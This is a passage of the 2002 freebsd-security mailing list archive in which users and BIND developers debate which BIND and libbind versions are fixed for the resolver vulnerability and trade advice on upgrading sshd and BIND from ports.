List-Unsubscribe: X-Loop: FreeBSD.org > At 03:56 PM 6/29/2002, Doug Barton wrote: > > >You quoted the second page. The URL I left in the quotation above is the > >announcement for 8.2.6, which says: > > > >Highlights vs. 8.2.5 > > Security Fix libbind. All applications linked against libbind > > need to relinked. > > So? That's not the version of libbind that's in 9.2.1. The version > in 9.2.1 is vulnerable; I've checked the source. No one is denying that the version in 9.2.1 is vulerable. You stated that 8.2.6 was vulnerable when it is not. Stop complaining when people correct your mis-statement. The "fix" for 9.2.1 is to use libbind from 8.2.6 or 8.3.3 until we (ISC) make a new bind release (9.2.2/9.3.0/snapshot). You can also just take the diff and patch the copy in 9.2.0/9.2.1. It should work though I haven't tested it. Mark > > --Brett > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 17:45:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3042C37B400; Sat, 29 Jun 2002 17:45:44 -0700 (PDT) Received: from mta03-svc.ntlworld.com (mta03-svc.ntlworld.com [62.253.162.43]) by mx1.FreeBSD.org (Postfix) with ESMTP id 227AF43E09; Sat, 29 Jun 2002 17:45:43 -0700 (PDT) (envelope-from scott.mitchell@mail.com) Received: from lungfish.ntlworld.com ([80.4.0.215]) by mta03-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020630004537.YHTM295.mta03-svc.ntlworld.com@lungfish.ntlworld.com>; Sun, 30 Jun 2002 01:45:37 +0100 Received: from tuatara.goatsucker.org (tuatara.goatsucker.org [192.168.1.6]) by lungfish.ntlworld.com (8.11.6/8.11.6) with ESMTP id g5U0jEV16919; Sun, 30 Jun 2002 01:45:14 +0100 (BST) (envelope-from scott@tuatara.goatsucker.org) Received: (from scott@localhost) by tuatara.goatsucker.org (8.12.3/8.12.3/Submit) id g5U0jDeP012805; Sun, 30 Jun 2002 01:45:13 +0100 (BST) (envelope-from scott) Date: Sun, 30 Jun 2002 01:45:13 +0100 From: Scott Mitchell To: "Jack L. Stone" Cc: Scott Robbins , FreeBSD user , Scott Gerhardt , FreeBSD , freebsd-security@FreeBSD.ORG Subject: Re: Sshd fix Message-ID: <20020630014513.D2920@fishballoon.dyndns.org> References: <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> <20020630004754.GA2600@scott1.homeunix.net> <3.0.5.32.20020629192508.0117cc50@mail.sage-one.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3.0.5.32.20020629192508.0117cc50@mail.sage-one.net>; from jackstone@sage-one.net on Sat, Jun 29, 2002 at 07:25:08PM -0500 X-Operating-System: FreeBSD 4.6-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 07:25:08PM -0500, Jack L. Stone wrote: > At 07:47 PM 6.29.2002 -0500, Scott Robbins wrote: > >On Sat, Jun 29, 2002 at 05:35:50PM -0500, Jack L. Stone wrote: > >> At 07:07 PM 6.28.2002 -0600, FreeBSD user wrote: > >> >cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE > >> install distclean > >> > > >> I just ran this on a test box and the sshd version shows no change... I saw > >> it compile and install, but #sshd -V gives old version #... > >> > >> What did I do wrong here...?? Don't know if this part has already been answered... anyway, you need to kill the old sshd and start your new one: # kill `cat /var/run/sshd.pid` ...compare the ssh_config and sshd_config files in /etc/ssh with the -dist versions installed by the port...make any appropriate config changes # /usr/sbin/sshd If that whines about any problems with the config files, fix those and try again. Repeat until it works. 'sshd -V' should tell you 3.4p1, provided /usr/sbin is on your path and you don't have any other ssh installed... are you sure you don't have one lurking in /usr/local? > This is what worries me too. I deinstalled the ssh port right afterwards, > but I'm wondering what else is changed. I noticed it updated the > openssl-0.9.6a to 0.9.6d that I didn't expect. The /var/db/pkg shows that > "d" version installed. > > I'm running SSL on that machine and it still says 0.9.6.a when I load > Apache_modssl and OpenSSH, etc. But, NOW, I'm really worried that I shot > myself in the foot and this is waiting to bite me later. > > If anyone knows the answer to what Scott said about the next make world > clobbering things, please let me know.... Just set NO_OPENSSH=true in /etc/make.conf. Then buildworld/installworld will just ignore OpenSSH entirely. I actually also added OPENSSH_OVERWRITE_BASE=true to make.conf, since I'll probably forget to use it if I need to update the port before OpenSSH 3 makes it into -STABLE. HTH, Scott (the other one :-) -- =========================================================================== Scott Mitchell | PGP Key ID | "Eagles may soar, but weasels Cambridge, England | 0x54B171B9 | don't get sucked into jet engines" scott.mitchell@mail.com | 0xAA775B8B | -- Anon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 18:10:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A9FDA37B400; Sat, 29 Jun 2002 18:10:14 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2361943E0A; Sat, 29 Jun 2002 18:10:13 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id TAA15534; Sat, 29 Jun 2002 19:10:03 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629190830.02aeab10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 19:09:59 -0600 To: Doug Barton , John Long From: Brett Glass Subject: Re: named 8.3.2-T1B vulnerable? Cc: security@FreeBSD.ORG In-Reply-To: <20020629170827.K5428-100000@master.gorean.org> References: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 06:15 PM 6/29/2002, Doug Barton wrote: >Next, libbind has the same resolver bug as our libc did. BUT, if you don't >link against libbind (and you'd know if you did) then you don't need to >worry about it. Why would you necessarily know? If you're building a port or package from source, or bring in a tarball directly and build it, you may wind up linking against libbind without knowing it. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 18:12:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5BB2137B400; Sat, 29 Jun 2002 18:12:38 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 64B9043E09; Sat, 29 Jun 2002 18:12:37 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id TAA15565; Sat, 29 Jun 2002 19:12:26 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629191122.02c948b0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 19:12:22 -0600 To: Mark.Andrews@isc.org From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: Doug Barton , Pete Ehlke , security@FreeBSD.ORG In-Reply-To: <200206300029.g5U0Tmm0062703@drugs.dv.isc.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 06:29 PM 6/29/2002, Mark.Andrews@isc.org wrote: > No one is denying that the version in 9.2.1 is vulerable. > > You stated that 8.2.6 was vulnerable when it is not. It's so far behind the latest version of BIND 8, which is 8.3.3, that I doubt that it would be possible to fix it without a time machine. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 18:18: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 05DC837B419 for ; Sat, 29 Jun 2002 18:18:02 -0700 (PDT) Received: from bastet.rfc822.net (bastet.rfc822.net [64.81.113.233]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8FF1C43E0A for ; Sat, 29 Jun 2002 18:18:01 -0700 (PDT) (envelope-from pde@bastet.rfc822.net) Received: by bastet.rfc822.net (Postfix, from userid 1001) id F0DBF9FD21; Sat, 29 Jun 2002 20:18:04 -0500 (CDT) Date: Sat, 29 Jun 2002 20:18:04 -0500 From: Pete Ehlke To: security@FreeBSD.ORG Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Message-ID: <20020630011804.GA24509@rfc822.net> References: <4.3.2.7.2.20020629180311.02b5b2d0@localhost> <4.3.2.7.2.20020629191122.02c948b0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020629191122.02c948b0@localhost> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 07:12:22PM -0600, Brett Glass wrote: > At 06:29 PM 6/29/2002, Mark.Andrews@isc.org wrote: > > > No one is denying that the version in 9.2.1 is vulerable. > > > > You stated that 8.2.6 was vulnerable when it is not. > > It's so far behind the latest version of BIND 8, which is 8.3.3, > that I doubt that it would be possible to fix it without a > time machine. > You are aware, Brett, that you are lecturing one of the BIND authors on the subtleties of the BIND source? Once and for all: there is a fixed 8.3.x. There is a fixed 8.2.x. There is even a fixed v4. This horse is dead. Please stop flogging it, for everyone's sake. -P. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 18:42:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 065BF37B400; Sat, 29 Jun 2002 18:42:07 -0700 (PDT) Received: from star.sstec.com (adsl-216-102-148-67.dsl.lsan03.pacbell.net [216.102.148.67]) by mx1.FreeBSD.org (Postfix) with ESMTP id E9E0943E0A; Sat, 29 Jun 2002 18:42:05 -0700 (PDT) (envelope-from fbsd1@sstec.com) Received: from comm.sstec.com (comm.sstec.com [192.168.74.10]) by star.sstec.com (8.12.3/8.12.3) with ESMTP id g5U1g2iO012313; Sat, 29 Jun 2002 18:42:05 -0700 (PDT) (envelope-from fbsd1@sstec.com) Message-Id: <5.1.0.14.2.20020629173206.021c88e0@mail.sstec.com> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sat, 29 Jun 2002 17:42:08 -0700 To: Doug Barton , John Long From: John Long Subject: Re: named 8.3.2-T1B vulnerable? Cc: security@FreeBSD.ORG In-Reply-To: <20020629170827.K5428-100000@master.gorean.org> References: <5.1.0.14.2.20020629142257.0221e050@mail.sstec.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:15 PM 6/29/2002, Doug Barton wrote: >On Sat, 29 Jun 2002, John Long wrote: > >> Running tag=RELENG_4_6 >> FreeBSD 4.6-RELEASE-p1 #2: Thu Jun 27 23:35:36 PDT 2002 >> 4 boxes, 8 rebuilds, libc now this libbind thing. >> >> My named 8.3.2-T1B Thu Jun 27 22:17:53 PDT 2002 appears to be vulnerable. > >Note, there are three seperate problems here. First, there is a libc >resolver vulnerability. This is fixed in the base by the security team >already. If your machines have a fixed libc, or if they are behind a BIND >9.2.1 resolver, they are safe; as long as they don't make any resolver >calls that don't go through the actual 9.2.1 resolver. > >Next, libbind has the same resolver bug as our libc did. BUT, if you don't >link against libbind (and you'd know if you did) then you don't need to >worry about it. > Hello Doug, thanks for the very quick response, Yes I run 2 primary dns servers that second for each other and about 600 domains. I do not trust the safety of the domains to anyone else. I would rather overwrite the base however is there any downside to this, now or in the future with the next build world... ? >Finally, if you are actually running named on any of these machines, you >should be using 8.3.3 if you're using BIND 8. You can build the bind8 port >with: > >make clean ; make -DPORT_REPLACES_BASE_BIND8 install > >and it will update the version of BIND on your system. You could also >leave off the flag if you'd rather have the new bind in /usr/local, but >8.3.2-T1B had some icky bugs so I recommend just writing over it to be >safe. > >> Any ideas on when/if the new bind will be getting to 4_6 ? > >I will be importing it into -current this weekend, if -current isn't too >terribly broken. I'll give that a week or so to shake out before importing >to RELENG_4. I doubt that the security officer team will want to import >BIND 8.3.3 into any of the RELENG_4_x branches. The port will do the same >work now, and will require less finagling. > >Hope this helps, > >Doug > With 8.3.2-T1B being so icky, should this subject not be mentioned on the stable list and is it not a security problem/potential root hole ( I am sure black hats are very busy right now) therefore should it not go into RELENG_4_6 as a -p2? And thank you very much for bringing this up Brett. I was fully under the impression that the sup and build for RELENG_4_6-p1 fixed all possibilities of this libc thing. Now I wonder just what else is there that has not been disclosed or thought of thus far? Finally thanks to all the people/coders involved with open source and FreeBSD :-) John R. Long Star Systems 818-344-9330 http://SSTec.com Be sure to check out Aesop's Fables, over 660 of them. http://AesopFables.com Yahoo, Yahooligans and many others "Site of the week" Over 35 million page views in 4.5years. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 20:38:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6C7D037B400 for ; Sat, 29 Jun 2002 20:38:29 -0700 (PDT) Received: from avocet.mail.pas.earthlink.net (avocet.mail.pas.earthlink.net [207.217.120.50]) by mx1.FreeBSD.org (Postfix) with ESMTP id D88FC43E1A for ; Sat, 29 Jun 2002 20:38:28 -0700 (PDT) (envelope-from sainttex@earthlink.net) Received: from user-38lc0mm.dialup.mindspring.com ([209.86.2.214] helo=reznor) by avocet.mail.pas.earthlink.net with smtp (Exim 3.33 #2) id 17OVXf-0007j1-00 for freebsd-security@freebsd.org; Sat, 29 Jun 2002 20:38:28 -0700 Message-ID: <001001c21fe7$9bdb1d50$0100a8c0@reznor> From: "Sainttex" To: Subject: subscribe Date: Sat, 29 Jun 2002 20:38:30 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000D_01C21FAC.EE182170" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_000D_01C21FAC.EE182170 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable sign me up! ------=_NextPart_000_000D_01C21FAC.EE182170 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
sign me up!
------=_NextPart_000_000D_01C21FAC.EE182170-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 21:12: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5206637B400 for ; Sat, 29 Jun 2002 21:11:59 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5381043E40 for ; Sat, 29 Jun 2002 21:11:56 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA16798; Sat, 29 Jun 2002 22:11:40 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629220046.02bed9a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 22:10:05 -0600 To: Pete Ehlke , security@FreeBSD.ORG From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-Reply-To: <20020630011804.GA24509@rfc822.net> References: <4.3.2.7.2.20020629191122.02c948b0@localhost> <4.3.2.7.2.20020629180311.02b5b2d0@localhost> <4.3.2.7.2.20020629191122.02c948b0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:18 PM 6/29/2002, Pete Ehlke wrote: >You are aware, Brett, that you are lecturing one of the BIND authors on >the subtleties of the BIND source? > >Once and for all: there is a fixed 8.3.x. There is a fixed 8.2.x. There >is even a fixed v4. In short, you've gone back and created fixed versions of these "ancient" bloodlines? If so, that's good, but it doesn't help the majority of us. In particular, it doesn't help people who install FreeBSD now, or who maintain it and need to make sure that everything's fixed. We need BIND 9 (required to shield other systems, including Solaris and Windows boxes, which are likely vulnerable) and a fixed libbind. Oh, and a fixed Sendmail, which right now can only be had if one risks installing a -STABLE snapshot. (4.6-RELEASE-p1, for some reasond, does not have it.) And you can't install binary packages if they contain statically linked binaries. In short, right now, it's damnably difficult to secure existing FreeBSD systems or to create new ones (for which I have clients waiting). So, pardon me if I seem frustrated. I'm responsible for plugging all the holes in the dikes and for building several systems that I cannot, right now, build with confidence. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 21:30:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 70ED037B405 for ; Sat, 29 Jun 2002 21:30:05 -0700 (PDT) Received: from smtp.noos.fr (claudel.noos.net [212.198.2.83]) by mx1.FreeBSD.org (Postfix) with ESMTP id E19F043E1A for ; Sat, 29 Jun 2002 21:30:03 -0700 (PDT) (envelope-from root@gits.dyndns.org) Received: (qmail 21372290 invoked by uid 0); 30 Jun 2002 04:30:02 -0000 Received: from unknown (HELO gits.gits.dyndns.org) ([212.198.229.153]) (envelope-sender ) by 212.198.2.83 (qmail-ldap-1.03) with SMTP for ; 30 Jun 2002 04:30:02 -0000 Received: from gits.gits.dyndns.org (uhwpol100x733smd@localhost [127.0.0.1]) by gits.gits.dyndns.org (8.12.4/8.12.4) with ESMTP id g5U4U1tY002586; Sun, 30 Jun 2002 06:30:01 +0200 (CEST) (envelope-from root@gits.dyndns.org) Received: (from root@localhost) by gits.gits.dyndns.org (8.12.4/8.12.4/Submit) id g5U4U0Ec002585; Sun, 30 Jun 2002 06:30:00 +0200 (CEST) (envelope-from root) Date: Sun, 30 Jun 2002 06:29:59 +0200 From: Cyrille Lefevre To: freebsd security , freebsd stable Subject: Re: bin/22212: skeyaccess(3) doesn't for primary group Message-ID: <20020630042959.GA2559@gits.dyndns.org> Mail-Followup-To: Cyrille Lefevre , freebsd security , freebsd stable Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.99i Organization: ACME X-Face: V|+c;4!|B?E%BE^{E6);aI.[< List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hi, anyone to commit this PR ? thanks in advance. Cyrille. -- Cyrille Lefevre mailto:cyrille.lefevre@laposte.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 21:59:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EEEE437B401 for ; Sat, 29 Jun 2002 21:59:38 -0700 (PDT) Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4B5B643E1A for ; Sat, 29 Jun 2002 21:59:38 -0700 (PDT) (envelope-from gshapiro@gshapiro.net) Received: from horsey.gshapiro.net (gshapiro@localhost [IPv6:::1]) by horsey.gshapiro.net (8.12.5.Beta0/8.12.5.Beta0) with ESMTP id g5U4xb36029397 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Sat, 29 Jun 2002 21:59:37 -0700 (PDT) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.5.Beta0/8.12.5.Beta0/Submit) id g5U4xbMl029394; Sat, 29 Jun 2002 21:59:37 -0700 (PDT) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15646.36921.451431.831549@horsey.gshapiro.net> Date: Sat, 29 Jun 2002 21:59:37 -0700 From: Gregory Neil Shapiro To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-Reply-To: <4.3.2.7.2.20020629154840.02cef6a0@localhost> References: <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <4.3.2.7.2.20020629154840.02cef6a0@localhost> X-Mailer: VM 7.03 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >> Only if you're using something that links against it. IMO you're better >> off just not having [libbind] around. brett> Some things link with it. I believe that Sendmail is among them. No, sendmail is quite happy with the libc resolver. Sure you can make it link with libbind (or any other library you feel like throwing in there :) if you wish, but it isn't necessary. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 22:53:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9C04737B400 for ; Sat, 29 Jun 2002 22:53:36 -0700 (PDT) Received: from rutger.owt.com (rutger.owt.com [204.118.6.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2393443E09 for ; Sat, 29 Jun 2002 22:53:36 -0700 (PDT) (envelope-from kstewart@owt.com) Received: from owt.com (owt-207-41-94-232.owt.com [207.41.94.232]) by rutger.owt.com (8.9.3/8.9.3) with ESMTP id WAA22358 for ; Sat, 29 Jun 2002 22:53:35 -0700 Message-ID: <3D1E9CDD.6050507@owt.com> Date: Sat, 29 Jun 2002 22:53:33 -0700 From: Kent Stewart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us, es-mx MIME-Version: 1.0 To: security@freebsd.org Subject: FreeBSD.Scalper.Worm Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org One of the people sending mail to -docs, pointed me to http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html It looks like more exposure needs to be provided via the web site and etc. Kent -- Kent Stewart Richland, WA http://users.owt.com/kstewart/index.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 23:48:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 55C9137B400 for ; Sat, 29 Jun 2002 23:48:08 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id A3B9743E09 for ; Sat, 29 Jun 2002 23:48:07 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 25324 invoked by alias); 30 Jun 2002 06:47:09 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 30 Jun 2002 06:47:09 -0000 Message-ID: <1025419629.25288.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 21982 invoked from network); 30 Jun 2002 06:46:29 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 30 Jun 2002 06:46:29 -0000 Received: (qmail 17635 invoked by alias); 30 Jun 2002 06:41:53 -0000 Received: (qmail 17629 invoked from network); 30 Jun 2002 06:41:52 -0000 Received: from boat.zero.ad.jp (211.11.96.137) by mail.securityfocus.com with SMTP; 30 Jun 2002 06:41:52 -0000 Received: from europa (f-fixed-113048032.zero.ad.jp [61.113.48.32]) by boat.zero.ad.jp (8.9.3+3.2W/3.7W) with SMTP id PAA12348 for ; Sun, 30 Jun 2002 15:47:18 +0900 (JST) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 21982 invoked from network); 30 Jun 2002 06:46:29 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 30 Jun 2002 06:46:29 -0000 Received: (qmail 17635 invoked by alias); 30 Jun 2002 06:41:53 -0000 Received: (qmail 17629 invoked from network); 30 Jun 2002 06:41:52 -0000 Received: from boat.zero.ad.jp (211.11.96.137) by mail.securityfocus.com with SMTP; 30 Jun 2002 06:41:52 -0000 Received: from europa (f-fixed-113048032.zero.ad.jp [61.113.48.32]) by boat.zero.ad.jp (8.9.3+3.2W/3.7W) with SMTP id PAA12348 for ; Sun, 30 Jun 2002 15:47:18 +0900 (JST) Date: Sun, 30 Jun 2002 15:47:18 +0900 From: Kuzuno Hiroki To: bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com Message-Id: <20020630154718.09f24aae.g031z051@edu.soft.iwate-pu.ac.jp> Organization: iwate-pu X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i386-debian-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message